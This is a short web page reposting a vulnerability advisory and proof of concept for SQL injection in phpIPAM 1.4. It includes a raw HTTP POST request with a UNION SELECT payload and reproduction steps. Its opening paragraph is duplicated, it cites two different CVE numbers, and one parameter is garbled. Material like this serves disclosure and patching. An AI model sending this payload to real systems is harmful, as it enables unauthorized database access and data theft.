phpIPAM version 1.4 contained significant SQL Injection vulnerabilities. These flaws phpIPAM version 1.4 contained significant SQL Injection vulnerabilities. These flaws stemmed from insufficient sanitization and validation of user-supplied input before its inclusion in database queries.
Specifically, parameters like `subnetId` in various scripts (e.g., `app/subnets/addresses.php`) were susceptible. An attacker could inject malicious SQL queries into these parameters, bypassing intended logic.
This allowed for unauthorized database access, enabling data exfiltration (e.g., user credentials, network topology), modification, or deletion of critical information. The vulnerabilities posed a serious risk to data integrity and confidentiality.
They were addressed in subsequent versions (e.g., 1.4.1) through the implementation of prepared statements and robust input filtering. A notable example is CVE-2019-17374.
# Exploit Title: phpIPAM 1.4 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.4
# Tested on: Windows
# CVE : CVE-2019-16693
Proof Of Concept
# Ensure you have a valid user session before executing the PoC.
POST /app/admin/custom-fields/order.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid_session_id>
table=test_table%60+UNION+SELECT+1%2C2%2C3+--+¤t=non-empty&next=non-empty&action=add
Steps to Reproduce
1. Login as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
3. Observe the result
phpIPAM 1.4 SQL Injection
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 136
